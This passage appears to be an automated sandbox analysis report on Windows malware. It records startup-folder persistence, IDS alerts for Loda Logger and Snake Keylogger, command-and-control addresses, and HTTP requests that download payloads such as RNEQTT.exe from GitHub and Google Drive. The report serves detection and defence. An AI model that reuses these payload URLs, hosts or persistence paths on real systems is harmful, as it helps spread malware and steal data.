                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 22_2_00232044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 22_2_0023219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 22_2_002324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 22_2_00226B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 22_2_00226E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 22_2_0022F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 22_2_0022FD47 FindFirstFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 22_2_001FDD92 GetFileAttributesW,FindFirstFileW,FindClose
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe | Code function: 22_2_0022FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming
                                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
                                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
                                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
                                Source: excel.exe | Memory has grown: Private usage: 5MB later: 69MB

                                Networking

                                Source: Network traffic | Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.4:49753 -> 172.111.138.100:5552
                                Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49753 -> 172.111.138.100:5552
                                Source: Network traffic | Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49745 -> 69.42.215.252:80
                                Source: Network traffic | Suricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.4:49753
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49740 -> 142.250.181.14:443
                                Source: C:\Windows\System32\wscript.exe | Network Connect: 185.199.108.133 443
                                Source: Malware configuration extractor | URLs: xred.mooo.com
                                Source: Initial file: .write cYVOaxXr.responseBody
                                Source: Initial file: .savetofile FileName , 2
                                Source: unknown | DNS query: name: freedns.afraid.org
                                Source: Joe Sandbox View | IP Address: 185.199.108.133
                                Source: Joe Sandbox View | IP Address: 172.111.138.100
                                Source: Joe Sandbox View | IP Address: 69.42.215.252
                                Source: Joe Sandbox View | ASN Name: VOXILITYGB
                                Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global traffic | HTTP traffic detected: GET /knkbkk212/knkbkk212/refs/heads/main/RNEQTT.exe HTTP/1.1
                                    Accept: */*
                                    Accept-Language: en-ch
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: raw.githubusercontent.com
                                    Connection: Keep-Alive
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe; Code function: 7_2_0023550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,7_2_0023550C
                                Source: global traffic; HTTP traffic detected: GET /knkbkk212/knkbkk212/refs/heads/main/RNEQTT.exe HTTP/1.1
                                    Accept: */*
                                    Accept-Language: en-ch
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: raw.githubusercontent.com
                                    Connection: Keep-Alive
                                Source: global traffic; HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                    User-Agent: Synaptics.exe
                                    Host: docs.google.com
                                    Cache-Control: no-cache
                                Source: global traffic; HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                    User-Agent: Synaptics.exe
                                    Cache-Control: no-cache
                                    Host: drive.usercontent.google.com
                                    Connection: Keep-Alive
                                Source: global traffic; HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                    User-Agent: Synaptics.exe
                                    Cache-Control: no-cache
                                    Host: drive.usercontent.google.com
                                    Connection: Keep-Alive
                                    Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global traffic; HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                    User-Agent: Synaptics.exe
                                    Host: docs.google.com
                                    Cache-Control: no-cache
                                    Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global traffic; HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                    User-Agent: MyApp
                                    Host: freedns.afraid.org
                                    Cache-Control: no-cache
                                Source: Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                                Source: global traffic; DNS traffic detected: DNS query: raw.githubusercontent.com
                                Source: global traffic; DNS traffic detected: DNS query: docs.google.com
                                Source: global traffic; DNS traffic detected: DNS query: xred.mooo.com
                                Source: global traffic; DNS traffic detected: DNS query: freedns.afraid.org
                                Source: global traffic; DNS traffic detected: DNS query: drive.usercontent.google.com
                                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                                    X-GUploader-UploadID: AFiumC5R9-y2K9Uc1YS28zKzMIjlr5Lsk_SnmicSaIKNBWItdEzvlSkHylIzxn0DZlD-UGVd
                                    Content-Type: text/html; charset=utf-8
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Wed, 25 Dec 2024 08:07:36 GMT
                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                    Content-Security-Policy: script-src 'report-sample' 'nonce-WWK9c0otsDCsIZGODaTMgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                    Cross-Origin-Opener-Policy: same-origin
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                    Content-Length: 1652
                                    Server: UploadServer
                                    Set-Cookie: NID=520=ES8n9cVyCUaunsy6BkYMzsBr24OjOb2KaLrMudzmiicf0zrQxE7a90KFSHonEK3bSfV4GkrhxYVtjQGHgZpQD4LoCKwcaYfpmdNTbAY0-4dqash3ELo436BN2GnWNTjm6pHSD-Mlclev7P-9DqeLvx7P6YWB2_TZmM2MFJL-yCfjy7fWQQmGVhc; expires=Thu, 26-Jun-2025 08:07:36 GMT; path=/; domain=.google.com; HttpOnly
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Content-Security-Policy: sandbox allow-scripts
                                    Connection: close
                                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                                    X-GUploader-UploadID: AFiumC4tfXR_jvBnoOmFWo_EU3txcxA31dCHxmsa1rvlDiKUk8nfIji9ctnaujoLm4XQ9GiJfsnXZGo
                                    Content-Type: text/html; charset=utf-8
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Wed, 25 Dec 2024 08:07:36 GMT
                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hsfk9xJEsLeQ7fTnu1KYYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    Cross-Origin-Opener-Policy: same-origin
                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                    Content-Length: 1652
                                    Server: UploadServer
                                    Set-Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY; expires=Thu, 26-Jun-2025 08:07:36 GMT; path=/; domain=.google.com; HttpOnly
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Content-Security-Policy: sandbox allow-scripts
                                    Connection: close
                                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                                    X-GUploader-UploadID: AFiumC4-gXrvpnS_x0sRkk5UjghrjASPgjZtMq48-Ign2VLt4zFndu5UpCUbYvo9vIyGx2vqawHggZo
                                    Content-Type: text/html; charset=utf-8
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Wed, 25 Dec 2024 08:07:42 GMT
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    Cross-Origin-Opener-Policy: same-origin
                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                    Content-Security-Policy: script-src 'report-sample' 'nonce-2tdIgcJMty6xbvmB5N4kfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                    Content-Length: 1652
                                    Server: UploadServer
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Content-Security-Policy: sandbox allow-scripts
                                    Connection: close
                                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                                    X-GUploader-UploadID: AFiumC5tWkbpQQfrWHUB1qF2whu5JOzeaVIYdglggN0xXM8cFaz--Cqbmg_Z7rVJ6lfhQN_ro7ePPwA
                                    Content-Type: text/html; charset=utf-8
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Wed, 25 Dec 2024 08:07:42 GMT
                                    Cross-Origin-Opener-Policy: same-origin
                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                    Content-Security-Policy: script-src 'report-sample' 'nonce-AMTLmBSgpgtiXi7zY_-KAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    Content-Length: 1652
                                    Server: UploadServer
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Content-Security-Policy: sandbox allow-scripts
                                    Connection: close
                                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found
                                    X-GUploader-UploadID: AFiumC6VFTziZmc-1Z9kBqSWv_iZRoUwfntOVECXnYRqZcaaQedZZ5fzbLyhLvQrksSI9kH0ncQcBXQ
                                    Content-Type: text/html; charset=utf-8
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Wed, 25 Dec 2024 08:08:07 GMT
                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                    Content-Security-Policy: script-src 'report-sample' 'nonce-tBPJd58qmnQfLVz_k7xn_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                    Cross-Origin-Opener-Policy: same-origin
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    Content-Length: 1652
                                    Server: UploadServer
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Content-Security-Policy: sandbox allow-scripts
                                    Connection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC461AqJeNU0bsxLJDj9Nt4gB8pTcDSJfwIG2raq8eQslZnfZq6Mgdj1JHidaBxjrhSlContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:07 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Ys2MXjkiSQMH0IbFyxPaDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6-UI5mK88lRPswtx-fAsCMQDiZRMSZYgSXkbXmSt71T4zF7kGkEfawWMf2ltJgCP5AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:13 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-Jou4T4o0EML-4h0QGELL6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ATCLUljMnGFjPbXP4pv-C9g3erijnJgFueJ6Y4jdIzA1xrgpTZX60x8FZQcGfabXNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:13 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-59cUY-mts2pNKvXhSvNqeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC46zEPSxOXnJtWRuxBmoPvCgz0JpN_GrTo3Gi877QCbuy14KGjfx15jolvfv1M3Ecmu1BCtmzYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:23 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-qQeMKvbM7tZEbPylnYa-ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4_VHd_DHUS-yvVglPwMuVHfMUwJxmocH_T_G-zVvfG3_xIUFRAIxrGCQZ1etoasOhxContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:23 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-_bfRP3NYFEcC_-4xr6hsDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5G0AM4hUSJeI6h3e2L7oWK-D2wJcZ-3KJu4sjfmC5ol39mQ4N3dgPQjsP0uQdfLNOJ94Zog5kContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:29 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-fiO4YhprWCb9ItcHu0vU8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7OgGrtJyLz_nvUtQ3y97wxkGnIvqplsCqMB_BI57gpw1MPEq-rDhLhsw18LbPGhyikContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:31 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-bP9JUtOrZbkyrIFlxoeDgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6u-0oQpt31XDUPCt26kfr5onLFzZWnLLjXeHFmgGub9Lqr0kjLHmEL43DnK7FnA4bBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:32 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4KbNiu16GpxBN4soZuVXWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, 